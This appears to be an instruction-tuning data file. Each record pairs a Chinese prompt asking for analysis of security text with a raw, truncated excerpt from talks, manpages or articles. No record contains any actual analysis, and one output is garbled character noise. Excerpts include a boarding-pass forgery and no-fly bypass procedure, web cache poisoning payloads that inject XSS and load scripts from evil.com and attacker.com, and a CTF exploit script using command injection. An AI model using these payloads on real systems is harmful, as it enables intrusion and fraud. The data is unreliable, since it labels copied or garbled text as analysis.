{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHow to get good seats in the security theater? Hacking boarding passes for fun and profit Przemek Jaroszewski przemj+defcon24@gmail.com $ whoami  head of Current Threat Analysis team at the Polish national CSIRT (CERT Polska)  10+ years of education in programming  Masters degree in social psychology  15 years of experience in IT security  aviation enthusiast, unrealized air traffic controller Up in the Air  FF miles are nice, but status in nicer Except when improvements dont work IATA Resolution 792  Paper  PDF417  Mobile  QR Code  Aztec  DataMatrix Bar-Coded Boarding Pass M1JAROSZEWSKI/PRZEMYSLE56XXXX WAWCPHSK 2762 666M009C0007 666>10B0 K6161BSK 2511799999153830 SK A3 199999999 *3000500A3G M1JAROSZEWSKI/PRZEMYSLE56XXXX WAWCPHSK 2762 666M009C0007 666>10B0 K6161BSK 2511799999153830 SK A3 199999999 *3000500A3G M1JAROSZEWSKI/PRZEMYSLE56XXXX WAWCPHSK 2762 666C009C0007 666>10B0 K6161BSK 2511799999153830 SK A3 199999999 *3000500A3G Where did we get?  Free Fast Track for all travellers M1COLUMBUS/CHRISTOPHERE56XXXX WAWCPHSK 2762 666M009C0007 666>10B0 K6161BSK 2511799999153830 SK A3 199999999 *3000500A3G M1COLUMBUS/CHRISTOPHERE56YYYY WAWCPHSK 2762 666M009C0007 666>10B0 K6161BSK 2511799999153830 SK A3 199999999 *3000500A3G Where did we get?  Free Fast Track for all travelers Wait, this is not news!  Bruce Schneier (2003): Flying On Someone Elses Airplaine Ticket  Andy Bowers (2005): Dangerous Loophole in Airport Security  Bruce Schneier (2006): The Boarding Pass Brouhaha  Christopher Soghoian (2007): Insecure Flight: Broken Boarding Passes and Ineffective Terrorist Watch Lists  Jeffrey Goldberg (2008): The Things He Carried  Charles C. Mann (2011): Smoke Screening No Fly List Bypass (in 2006)  Buy tickets under false name  Print your boarding pass at home  Create a copy of the boarding pass with your real name  Present the fake boarding pass and the real ID to TSA officers  Present the real boarding pass to gate agents  Fly No Fly List Bypass (in 2016 Europe)  Buy tickets u", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n! \" # $ % \" & ' $ ( % ' % \" ) * ) & # \" # + * , ) # ' # ) & - % . # ' ' , \" & . * ) & # \" * \" / / & * 0 \" # 1 ) & . $ 2 # ) # . # ( 1 3 4 5 % 0 # * ( # + ) 5 % 6 $ % \" 6 ) ) # 7 2 # 8 % . ) & 1 ) # $ 2 # - & / % . # ' $ ( % ) % + 2 % % * \" / # $ % \" * . . % 1 1 ) # ) 5 % \" % ) 9 # 2 : % / % ( % . ) 2 # \" & . / % - & . % 1 & \" * \" * , ) # ' # ; & ( % 3 4 5 % & \" ) % 2 + * . % ) # - % 5 & . ( % / % - & . % 1 9 & ( ( ; % $ 2 & ' * 2 & ( < ) 5 2 # , 0 5 ) 5 % 1 ) * \" / * 2 / / & * 0 \" # 1 ) & . . # \" = \" % . ) # 2 > ) 5 # , 0 5 . # ' ' , \" & . * ) & # \" 9 & ( ( ; % 1 , $ $ # 2 ) % / ) 5 2 # , 0 5 * ( ( ; , 1 1 % 1 > \" # ) # \" ( < / & * 0 \" # 1 ) & . ; , 1 1 % 1 3 ! . . % 1 1 ) # - % 5 & . ( % / % - & . % 1 9 & ( ( & \" . ( , / % ' # \" & ) # 2 & \" 0 * \" / / & * 0 \" # 1 ) & . 1 * 1 9 % ( ( * 1 2 % $ 2 # 0 2 * ' ' & \" 0 * \" / % \" 5 * \" . % / . # \" ) 2 # ( # + ) 5 % & 2 # $ % 2 * ) & # \" 3 ? @ A B C D B C E F G H I J K H I L M N O N P Q R S T U V W X V R Y Z [ Y \\ ] T Z Y  Y _ ` S O O O O O O O O O O O O O O O O O O O O a N O N O N P ] W S Y b T c ` Q d e c ] W V ` T e _ fP b d g O O O O O O O O O O O O O O a N O N O h i V Z T V j W Y P ] W S Y b T c ` Q d e c ] W V ` T e _ f i P b g O O O O O O O O O a N O N Oa k l m O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O n N O N O n o e _ ` Z e W W Y Z p Z Y V q Y ` r e Z s f o p q g O O O O O O O O O O O O O O n N O h l e t ` r V Z Y u V ` V X T _ s u Y v T U Y S O O O O O O O O O O O O O O O O O O O O O w N O h O N l Y Z T V W O O O O O O O O O O O O O O O O O O O O O O O O O O O O O w N O h O h P V Z V W W Y W O O O O O O O O O O O O O O O O O O O O O O O O O O O O w N O h Oa x P k m O O O O O O O O O O O O O O O O O O O O O O O O O O O O O y N Oa z V Z c r V Z Y u V ` V X T _ s u Y v T U Y S O O O O O O O O O O O O O O O O O O O O y N Oa O N d T U Z e U e _ ` Z e W W Y Z O O O O O O O O O O O O O O O O O O O O O O O O y N Oa O h P Z e { Z V   V j W Y z V Z c r V Z Y O O O O O O O O O O O O O O O O O O | N Oa Oa u Y", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.TH ROUTE 8 \"2 January 2000\" \"net-tools\" \"Linux Programmer's Manual\" .SH NAME .B route - 显示 / 操作IP选路表 .SH 总览 SYNOPSIS \\fBroute\\fR [-CFvnee] \\fBroute\\fR [-v] [-A family] add [-net|-host] target [netmask Nm] [gw Gw] [metric N] [mss M] [window W] [irtt I][reject] [mod] [dyn] [reinstate] [[dev] If] \\fBroute\\fR [-v] [-A family] del [-net|-host] target [gw Gw][netmask Nm] [metric N] [[dev] If] \\fBroute\\fR [-V] [--version] [-h] [--help] .SH 描述 DESCRIPTION route程序对内核的IP选路表进行操作它主要用于通过已用ifconfig(8)程序配置好的接口来指定的主机或网络设置静态路由 .SH 选项 OPTIONS .TP -v 选用细节操作模式 .TP -A family 用指定的地址族(如`inet'`inet6') .TP -n 以数字形式代替解释主机名形式来显示地址此项对试图检测对域名服务器进行路由发生故障的原因非常有用 .TP -e 用netstat(8)的格式来显示选路表-ee将产生包括选路表所有参数在内的大量信息 .TP -net 路由目标为网络 .TP -host 路由目标为主机 .TP -F 显示内核的FIB选路表其格式可以用-e 和 -ee选项改变 .TP -C 显示内核的路由缓存 .TP del 删除一条路由 .TP add 添加一条路由 .TP target 指定目标网络或主机可以用点分十进制形式的IP地址或主机/网络名 .TP netmask Nm 为添加的路由指定网络掩码 .TP gw Gw 为发往目标网络/主机的任何分组指定网关注意指定的网关首先必须是可达的也就是说必须为该网关预先指定一条静态路由如果你为本地接口之一指定这个网关地址的话那么此网关地址将用于决定此接口上的分组将如何进行路由这是BSD风格所兼容的 .TP metric M 把选路表中的路由值字段(由选路进程使用)设为M .TP mss M 把基于此路由之上的连接的TCP最大报文段长度设为M字节这通常只用于优化选路设置默认值为536 .TP window W 把基于此路由之上的连接的TCP窗口长度设为W字节这通常只用于AX.25网络和不能处理背对背形式的帧的设备 .TP irtt I 把基于此路由之上的TCP连接的初始往返时间设为I毫秒(1-12000)这通常也只用于AX.25网络如果省略此选项则使用RFC1122的缺省值300ms .TP reject 设置一条阻塞路由以使一条路由查找失败这用于在使用缺省路由前先屏蔽掉一些网络但这并不起到防火墙的作用 .TP mod, dyn, reinstate 设置一条动态的或更改过的路由这些标志通常只由选路进程来设置这只用于诊断目的 .TP dev If 强制使路由与指定的设备关联因为否则内核会自己来试图检测相应的设备(通常检查已存在的路由和加入路由的设备的规格)在多数正常的网络上无需使用 如果dev If是命令行上最后一个指定的选项那么可以省略关键字dev因为它是缺省值否则路由修改对象(metric - netmask- gw - dev)无关紧要 .SH 范例 EXAMPLES .TP route add -net 127.0.0.0 加入正常的环回接口项它使用掩码255.0.0.0(由目标地址决定了它是A类网络)并与设备\"lo\"相关联(假定该设备先前已由ifconfig(8)正确设置) .TP route add -net 192.56.76.0 netmask 255.255.255.0 dev eth0 向\"eth0\"添加一条指向网络192.56.76.x的路由其中的C类子网掩码并不必须因为192.*是个C类的IP地址在此关键字\"dev\"可省略 .TP route add default gw mango-gw 加入一条缺省路由(如果无法匹配其它路由则用它)使用此路由的所有分组将通过网关\"mango-gw\"进行传输实际使用此路由的设备取决于如何到达\"mango-gw\" - 先前必须设好到\"mango-gw\"的静态路由 .TP route add ipx4 sl0 向SLIP接口添加一条指向\"ipx4\"的路由(假定\"ipx4\"是使用SLIP的主机) .TP", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 黑灰产形式 此章节整理了黑灰产的不同形式 ## 1. 按内容划分 ### 1.1 赌博类 #### 博彩菠菜 TODO #### 开箱网站基于Steam市场 > 开箱网站吸引人的策略和博彩网站无异一开始时会先让你尝到甜头开出价值较高的游戏皮肤刺激你继续消费后门逐步降低爆出率玩家最终走出了自古以来的赌博路线开箱-获利-继续开-损失-想要挽回损失-损失更大 > > https://ti.qianxin.com/blog/articles/southeast-asian-gaming-industry-research-report/ ### 1.2 外挂 #### 场控外挂 从直播行业中衍生出的一种外挂形式场控的角色在直播行业人员架构中主要负责协调和实施具体来说可以做自动欢迎礼物答谢自动喊话关注感谢[1]等 ### 1.3 黑客攻击类 #### 网站劫持黑帽SEO 我们先来看一下概念 > 1入侵相关网站 > > 2然后在网站中插入JS或修改其配置文件增加相应的劫持代码另外一般会加入判断条件判断条件一般会根据user-agent或referer进行判断大多数判断条件会判断是爬虫还是人工如果是人工会返回正常的网站如果是爬虫会返回相关博彩娱乐类等黑客设置好的网站 > > 3爬虫去访问时返回是相关博彩娱乐类网站导致收录的是黑客精心准备好的网站 > > 4黑帽SEO基本上都是给爬虫收录的对于正常的人工访问会返回正常的内容所以导致这种网站很难发现并且其存留时间相对较长 > > 真实网站劫持案例分析[feiniao ](https://www.freebuf.com/author/feiniao)https://www.freebuf.com/articles/web/153788.html ### 1.4 洗钱类 #### 跑分平台 此处的跑分不是指数码产品评测跑分而是指利用正常用户包括个人企业的微信支付宝等的收款码帮助他人收款从中赚取佣金[2]跑分平台本质上就是一个洗钱团伙帮助需要洗钱的客户例如诈骗团伙将非法所得的钱通过正常用户收款账户进行代收然后跑分平台又利用正常用户先前支付的押金分发给所服务的客户这样就把钱给洗白了收款被查的风险就从需要洗钱的客户转移到了其他的正常用户以及跑分平台 我们回顾一下洗钱的三个阶段[3] - 处置实际处理犯罪所得的现金或其他资产 - 离析经过层层金融交易来隐匿资金来源将非法所得与其真实来源分离开来 - 融合以看似正常业务或个人交易的形式将资金重新投入到经济活动中使得非法财产看似具有合法性 对应来说跑分平台的功能在做洗钱三个阶段中的处置和离析收钱分离真实来源 跑分平台这部分角色称为码商其发展模式普遍来说也是自己单干跑分后来发展下线引流一方面赚取赚取收款佣金一方面通过发展下线赚取代理费 ![](https://image-host-toky.oss-cn-shanghai.aliyuncs.com/20201009110144.png) 图跑分平台黑产运作流程图[2] >  1已经从事跑分的用户需要拉下级发展下线 > >  2租借正常用户账户发布兼职信息 > >  3需要兼职的用户找到发布兼职的的平台找到相关兼职 > >  4发布兼职的用户让兼职人员添加自己的某某社交账户并发送跑分平台信息 > >  5兼职用户下载跑分平台APP并注册登录完善信息包括了绑定***上传收款码交押金等 > >  6黑灰产团队在跑分平台放单 > >  7兼职用户在跑分平台接单 > >  8黑灰产团队将从跑分平台获取的对应用户的收款码***号发给被诈骗的用户 > >  9被诈骗的用户将钱转给兼职用户 > >  10\"跑分平台\"将兼职用户的押金转给黑灰产团队账户 > > 一个完整的跑分流程完成[3] 这个流程简单来说就是 - 普通用户加入跑分平台支付押金提供收款码 - 跑分平台放单 - 黑钱转入普通用户账户普通用户赚取佣金 - 跑分平台把押金转移给需要洗钱的客户赚取佣金 - 需要洗钱的客户收到平台的钱这部分钱来自普通用户的押金 #### 四方支付 四方支付也叫聚合支付正如其名其主要就是做支付能力整合方便C端用户支付帮助商家收款赚取服务费或佣金**我们不能说所有的四方支付都是黑产**但其中也确实有相当大的一部分灰色地带正规的四方支付也可能夹杂着做黑灰产服务主动或者被动黑产四方支付也可能用正常服务做伪装 TODO ## 2. 按服务模式划分 ### BaaS BaaSBad Bots as a Service恶意软件即服务随着从事黑灰产人员素质的提高黑产团伙逐渐向专业化规模化与产业化转型[1]因此也相应地诞生催动了恶意软件即服务这种服务模式类比于SaaSSoftware as a Service软件即服务BAAS的含义就是客户只需要购买这个恶", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Web Cache Poisoning ## Introduction The objective of web cache poisoning is to send a request that causes a harmful response that gets saved in the cache and served to other users. ## Where to find `-` ## How to exploit 1. Basic poisoning ``` GET / HTTP/1.1 Host: www.vuln.com X-Forwarded-Host: evil.com ``` The response is ``` HTTP/1.1 200 OK Cache-Control: public, no-cache  <img href=\"https://evil.com/a.png\" /> ``` > Or you can input XSS payloads ``` GET / HTTP/1.1 Host: www.vuln.com X-Forwarded-Host: a.\\\"><script>alert(1)</script> ``` The response is ``` HTTP/1.1 200 OK Cache-Control: public, no-cache  <img href=\"https://a.\\\"><script>alert(1)</script>a.png\" /> ``` 2. Seizing the Cache ``` GET / HTTP/1.1 Host: unity3d.com X-Host: evil.com ``` The response is ``` HTTP/1.1 200 OK Via: 1.1 varnish-v4 Age: 174 Cache-Control: public, max-age=1800  <script src=\"https://evil.com/x.js\"> </script> ``` 3. Selective poisoning ``` GET / HTTP/1.1 Host: redacted.com User-Agent: Mozilla/5.0 (<snip> Firefox/60.0) X-Forwarded-Host: a\"><iframe onload=alert(1)> ``` The response is ``` HTTP/1.1 200 OK X-Served-By: cache-lhr6335-LHR Vary: User-Agent, Accept-Encoding  <link rel=\"canonical\" href=\"https://a\">a<iframe onload=alert(1)> ``` 4. Chaining Unkeyed Inputs - First step ``` GET /en HTTP/1.1 Host: redacted.net X-Forwarded-Host: xyz ``` The response is ``` HTTP/1.1 200 OK Set-Cookie: locale=en; domain=xyz ``` - Second step ``` GET /en HTTP/1.1 Host: redacted.net X-Forwarded-Scheme: nothttps ``` The response is ``` HTTP/1.1 301 Moved Permanently Location: https://redacted.net ``` - Third step ``` GET /en HTTP/1.1 Host: redacted.net X-Forwarded-Host: attacker.com X-Forwarded-Scheme: nothttps ``` The response is ``` HTTP/1.1 301 Moved Permanently Location: https://attacker.com/en ``` 5. Route Poisoning ``` GET / HTTP/1.1 Host: www.goodhire.com X-Forwarded-Server: evil ``` The response is ``` HTTP/1.1 404 Not Found CF-Cache-Status: MISS ... <title>HubSpot - Page not found</title> <p>The", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Level12 #### About There is a backdoor process listening on port 50001. To do this level, log in as the level12 account with the password level12. Files for this level can be found in /home/flag12. #### Source Code ``` local socket = require(\"socket\") local server = assert(socket.bind(\"127.0.0.1\", 50001)) function hash(password) prog = io.popen(\"echo \"..password..\" | sha1sum\", \"r\") data = prog:read(\"*all\") prog:close() data = string.sub(data, 1, 40) return data end while 1 do local client = server:accept() client:send(\"Password: \") client:settimeout(60) local line, err = client:receive() if not err then print(\"trying \" .. line) -- log from where ;\\ local h = hash(line) if h ~= \"4754a4f4bd5787accd33de887b9250a0691dd198\" then client:send(\"Better luck next time\\n\"); else client:send(\"Congrats, your token is 413**CARRIER LOST**\\n\") end end client:close() end ``` #### Solutions ``` nc -v 127.0.0.1 50001 test | /bin/getflag | tee /tmp/level12.txt cat /tmp/level12.txt ``` #### Exploits ``` #!/usr/bin/env python import socket def exploit(host, port): tmpfile = \"/tmp/7845.yxha\" payload = \"xxx | /bin/getflag > %s \\n\" % tmpfile c = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_IP) addr = (host, port) c.connect(addr) data = c.recv(1024) if 'Password' in data: print \"[+] exploit %s\\n%s\" % (addr, payload) c.sendall(payload) # data = c.recv(1024) # print data c.close() def main(): exploit('127.0.0.1', 50001) if __name__ == \"__main__\": main() ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5. .\\\"******************************************************************* .\\\" .\\\" This file was generated with po4a. Translate the source file. .\\\" .\\\"******************************************************************* .TH MKTEMP 1 2022年9月 \"GNU coreutils 9.1\" 用户命令 .SH 名称 mktemp \\- 创建一个临时文件或目录 .SH 概述 \\fBmktemp\\fP [\\fI\\,选项\\/\\fP]... [\\fI\\,模板\\/\\fP] .SH 描述 .\\\" Add any additional description here .PP 安全地创建一个临时文件或目录并打印出其名称所给定的模板字符串的最后一部分必须包含至少三个连续的X如果没有指定模板字符串程序将默认使用tmp.XXXXXXXXXX并默认启用 \\fB\\-\\-tmpdir\\fP 选项文件创建时权限使用 u+rw而目录使用 u+rwx在此基础上再减去 umask 所体现的权限限制 .TP \\fB\\-d\\fP, \\fB\\-\\-directory\\fP 创建一个目录而非文件 .TP \\fB\\-u\\fP, \\fB\\-\\-dry\\-run\\fP 不要创建任何文件只打印一个名称不安全 .TP \\fB\\-q\\fP, \\fB\\-\\-quiet\\fP 隐藏文件/目录创建出错时的诊断信息 .TP \\fB\\-\\-suffix\\fP=\\fI\\,后缀名\\/\\fP 将后缀名附加到模板字符串后后缀名不能含有斜线如果模板字符串不以X结尾该选项将默认被选中 .TP \\fB\\-p\\fP 目录, \\fB\\-\\-tmpdir\\fP[=\\fI\\,目录\\/\\fP] 将模板解释为相对于给定目录如果未指定目录在设置了 $TMPDIR 变量时使用这个变量的值否则使用 \\fI\\,/tmp\\/\\fP使用该选项时模板不能是绝对路径与 \\fB\\-t\\fP 不同模板字符串可以包含斜线但此时 mktemp 只会创建斜线后的部分 .TP \\fB\\-t\\fP 将模板解释为相对与一个目录的单个文件名部分该目录在 $TMPDIR 变量已设置时取该变量的值否则使用 \\fB\\-p\\fP 参数指定的目录再次将回退至使用 \\fI\\,/tmp\\/\\fP [不推荐] .TP \\fB\\-\\-help\\fP 显示此帮助信息并退出 .TP \\fB\\-\\-version\\fP 显示版本信息并退出 .SH 作者 由 Jim Meyering 和 Eric Blake 编写 .SH 报告错误 GNU coreutils 的在线帮助 <https://www.gnu.org/software/coreutils/> .br 请向 <https://translationproject.org/team/zh_CN.html> 报告翻译错误 .SH 版权 Copyright \\(co 2022 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>. .br 本软件是自由软件您可以自由修改和重新发布它在法律允许的范围内不提供任何保证 .SH 参见 \\fBmkstemp\\fP(3), \\fBmkdtemp\\fP(3), \\fBmktemp\\fP(3) .PP .br 完整文档请见 <https://www.gnu.org/software/coreutils/mktemp> .br 或者在本地使用 info \\(aq(coreutils) mktemp invocation\\(aq", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAbout your JOB Ethen @ TDOH Security Consultant Defense / Forensic / Analysis Full-stack SOC Engineer Developer Free and Open ethen@tdohacker.org XXX       Penetration Test SOC SOC Security Operation Center / / 2016/06/26 ...  TDOH https://goo.gl/jaVUtO https://goo.gl/RqN9y1 http://tdohacker.org/ VSSecurity HITCON", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWiMAX Hacking 2010 pierce goldy aSmig DEFCON 18 updated slides, code, and discussion at https://groups.google.com/group/wimax-hacking The Technology Service and Deployment Reseller Access Echo Peak Clearspot Hacking the Home Device HTC EVO Captive Portal Bypass Location Based Services Google Group https://groups.google.com/group/wimax-hacking", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMemory Wars: 對記憶體攻擊手法與防禦技術的探討 Authorized Morphor distributor Leo Liaw 數位資安系統股份有限公司 | 2 Agenda 記憶體漏洞 How Windows execute an executable? What is PE? 微軟防護記憶體攻擊的工具 (EMET)  EMET 版本沿革  EMET 的限制 EMET/ASLR 以外的工具 We need to do better Before and After 3 | 記憶體漏洞 4 | 記憶體漏洞都是來自於載入可能錯誤的內容到程式中 記憶體漏洞  Intra-chunk heap overflow or relative write  Shader Parameter heap corruption  ..  Buffer overflow (heap 或 stack)  Type confusion  Use-after-free (UAF)  Integer overflow  stack corruptions  Inter-chunk heap overflow or corruption 5 | 執行惡意程式 操控電腦 攻擊網路 窺視其他網路主機 竊取資料 破壞數據 讓程式或系統當機 拒絕服務 Everything bad all because of you 你可以用記憶體漏洞做甚麼事 7 | 記憶體攻擊範例: CVE-2016-4117 Source: https://tirateunping.wordpress.com/2016/05/17/cve-2016-4117-fireeye-revealed-the-exploit-chain-of-recent-attacks/ 記憶體攻擊類型: Type confusion 1. 受害者開啟惡意的 Office 文件 1. Office 文件開始執行內嵌的 Flash 檔案 1. 如果 Flash Player 版本太舊攻擊就會終止 2. 否則攻擊就會執行內嵌的 Flash Exploit (Type Confusion/All Memory Attack 都是在這 裡發生, Devils are here) 2. Exploit 執行內嵌的原生 Shellcode 1. Shellcode 會從攻擊者的伺服器下載並執行第二個 Shellcode 3. 第二個 Shellcode 1. 下載並執行 Malware 2. 下載並顯示 Decoy 文件 4. Malware 連線到第二個 Command and Control (C2) 伺服 器等待進一步的指示 | 11 長久以來微軟也體認到記憶體漏洞的嚴重威脅所以陸續推出 相關防護的技術 How Windows execute an executable? | 14 1. .EXE is loaded from disk  Parse PE headers  Map sections into memory  Parse Import Table 2. Load DLL dependencies  Resolve import API functions 3. Transfer execution to the .EXE Entry Point  AddressOfEntryPoint Process Creation Overview Figure Source: Memory Management 1  2000 Franz Kurfess Course Overview Principles of Operating Systems Introduction Computer System Structures Operating System. | 15 Windows implements a virtual memory model  Virtual memory is independent of physical memory Every process had its own private virtual address space  Process are isolated and cannot inadvertently modify each others memory  Physical-to-virtual memory translations are managed in the Windows kernel  Completely transparent to user process Process Memory | 16 Each time an exec", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWho Controls the Past Controls the Future Who Controls the Present Controls the Past Nothing gives rest but the sincere search for truth. -Pascal Greetz from Room 101 Kenneth Geers 1984 # Nineteen Eighty-Four (Orwell) # Govt IW vs own populace # Ministry of Truth, Thought Police # Two-way telescreens # Room 101 # Can Big Brother reprogram Winston? 2007 # The Internet is life # Goodbye traditional media # Unpredictable nature of the Net # Weaponization of the Net # Government repression & legitimate criminal pursuit Greetz 101 Palace Strategy # Rule #1: Never trust the Internet # Must shrink the info space #Family-centric calendar (T-stan) #DDoS the news (K-stan) # Good reasons for censorship #Criminal, cultural, religious #Political adversaries Greetz 101 Tactics # Goal #1: the delivery of unaltered messages to your citizens #(And denial of the same to your rivals) # The Internet can help #Surveillance/manipulation #State-owned telecoms Cyber S.W.A.T. # Read, delete, modify data packets #By IP, domain, strings, etc # Call law enforcement when necessary # Plausible deniability in Cyberspace # International politics? Human rights? Buehler? Which Internet? # The Eastern Albonian Internet #Few international sites #Heavily regulated local sites # Some gvts open, proud of censorship #Better than silence #Secrecy may imply impropriety Practical Challenges # Filtering Net traffic is not easy #Networks are complex, dynamic #Change control a nightmare # No network is air-tight #Sophisticated users #Hostile network operations Denial of Sin (DoS) # Sex words make great keywords #Pornography easier than politics # Blacklists should be double- checked by real people #Marinated chicken breasts #Middlesex County # How to poison a webserver Programming & Politics # Challenge for AI: words in context #Was that constructive criticism? #Humour, irony, sarcasm, satire? # SME required #History, language, culture #Impossible in Internet era #Esp for one-man show: NK, T-stan The Despot's C", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n微软AD如何定位域控 我在本地搭建了个域 DC 192.168.1.200 名字为DCSERVER client 192.168.1.151 DNS loca.test.com 在搭建完域之后先把域控启动后再启动客户机的机器的时候抓了下包 在3-6条 1.client请求DNS服务器的ldap.tcp.dc._msdcs.loca.test.com的SRV记录 2.DNS服务器返回SRV记录的服务端 A记录192.168.1.200389 3.client拿到SRV的值以后发送解析A记录的请求 4.DNS服务器返回了解析的域名+IP地址 第1.2步是从DNS SRV拿数据 第3.4步是把拿到的srv的数据解析为IP 在拿到srv的记录后存储的是域名和端在进余下的操作的时候是要解析为IP地址再进通信的 以下为MS档中对SRV记录在AD中的作 SRV记录DNS中的种信息记录它将服务的名称映射到域名系统名字提供该服务的服务器的域控制器 DC的宣传是其由DNS SRV记录实现的此功能在DNS服务器则下图所设置 在拿到DNS的SRV记录后还会在发送个UDP的数据包7这个包在wireshark中标记为CLDAPLDAP ping 在Microsoft Active Directory络中最常其中客户端使LDAP或CLDAP进LDAP ping来检索服务 器信息 在理解LDAP PING之前先看下前置知识 LDAP服务器提供有关身的信息以及特定于每个服务器的其他信息例如它的功能它持的 LDAP 版本以及它 使的命名上下存储这些信息的是rootDSE 为录服务器上录数据树的根rootDSE 不是任何命名空间的 部分rootDSE 的的是提供有关录服务器的数据这些信息不经过身份验证即可访问只读存储的所有信 息如下 A --> Windows 2000 D --> Windows Server 2003 operating system DR2 --> Windows Server 2003 R2 operating system G --> ADAM K --> Windows Server 2008 operating system AD DS L --> Windows Server 2008 AD LDS N --> Windows Server 2008 R2 operating system AD DS P --> Windows Server 2008 R2 AD LDS S --> Windows Server 2012 operating system AD DS T --> Windows Server 2012 AD LDS V --> Windows Server 2012 R2 operating system AD DS W --> Windows Server 2012 R2 AD LDS Y --> Windows Server 2016 operating system AD DS Z --> Windows Server 2016 AD LDS B2 --> Windows Server v1709 operating system AD DS C2 --> Windows Server v1709 AD LDS E2 --> Windows Server v1803 operating system AD DS F2 --> Windows Server v1803 AD LDS H2 --> Windows Server v1809 operating system AD DS I2 --> Windows Server v1809 AD LDS K2 --> Windows Server 2019 operating system AD DS Attribute name A D, DR2 G K, N L, P S T V W Y Z B2 C2 E2, H2, K2 F2, I2, L2 configurationNamingContext X X X X X X X X X X X X X X X currentTime X X X X X X X X X X X X X X X defaultNamingContext X X X X X X X X X X X X X X X dNSHostName X X X X X X X X X X X X X X X dsSchemaAttrCount X X X X X X X X X X X X X X X dsSchemaClassCount X X X X X X X X X X X X X X X dsSchemaPrefixCount X X", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 计算机操作系统 - [概述](计算机操作系统%20-%20概述.md) - [进程管理](计算机操作系统%20-%20进程管理.md) - [死锁](计算机操作系统%20-%20死锁.md) - [内存管理](计算机操作系统%20-%20内存管理.md) - [设备管理](计算机操作系统%20-%20设备管理.md) - [链接](计算机操作系统%20-%20链接.md) ## 参考资料 - Tanenbaum A S, Bos H. Modern operating systems[M]. Prentice Hall Press, 2014. - 汤子瀛, 哲凤屏, 汤小丹. 计算机操作系统[M]. 西安电子科技大学出版社, 2001. - Bryant, R. E., & OHallaron, D. R. (2004). 深入理解计算机系统. - 史蒂文斯. UNIX 环境高级编程 [M]. 人民邮电出版社, 2014. - [Operating System Notes](https://applied-programming.github.io/Operating-Systems-Notes/) - [Operating-System Structures](https://www.cs.uic.edu/\\~jbell/CourseNotes/OperatingSystems/2_Structures.html) - [Processes](http://cse.csusb.edu/tongyu/courses/cs460/notes/process.php) - [Inter Process Communication Presentation[1]](https://www.slideshare.net/rkolahalam/inter-process-communication-presentation1) - [Decoding UCS Invicta  Part 1](https://blogs.cisco.com/datacenter/decoding-ucs-invicta-part-1)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 2  Who are we  Background  Picking our battles  The web vuln  Intermission  Telematics  What is it  Local vulnerabilities discovered  Writing a blind exploit  Remote vulnerability  Conclusion  Public statements  Questions Jesse @jessemichael Mickey @HackingThings Alex @ABazhaniuk https://www.mcafee.com/us/threat-center/advanced-threat-research/index.aspx 3 4  After we were done with our previous hackary, we wanted to try something new  We want to deepen our knowledge and experience with automotive security  Actual car hacking experience is at 0% 5  Autonomous vehicles  Tesla Autopilot  Comma.io  Google self driving car  UBER  Connected cars  Autonomous  V2X  V2V  Drive by wire systems, how does it work? 6  Charlie Miller and Chris Valasek  Troy Hunt and Scott Helme - Nissan web API hack  Kevin Mahaffey and Marc Rogers (Tesla hack 2015)  Keen Labs Tesla hack  And more... 7  Budget?  Where do we start?  We already pwned an after market IVI , what is next? *IVI = In-Vehicle Infotainment System  Ok, Lets go the wrecking yard and look around 8  Funny story about the wrecking yard.  Looking for a late model OEM IVI.  What do you have?  An F150 that got into a brawl with a wall and lost  and more squashed cars  A junk yard != wrecking yard. 9  Nice car!  Can you spot what caused it to be Totaled? 10  GIMME THAT DASHBOARD! 11  1 week later  carception 12  A trip to Lowes and a few hours later 13  Once it is fully assembled it kinda works  A few errors appear on the instrument panels.  We need to get this thing on the table somewhat functional  NissanConnect EV 14  NissanConnectSM EV (formerly known as CARWINGS) is designed to help you manage your Nissan LEAF and control a host of convenient features. The best part: you dont have to be in or even near your car to do it. It all works through your smartphone or computer. [*]  NissanConnect EV is complimentary for three years. You just need to download the companion app to run all the features listed below. WITH THE NISSANCON", "category": "text_analysis", "source": "security_papers"}
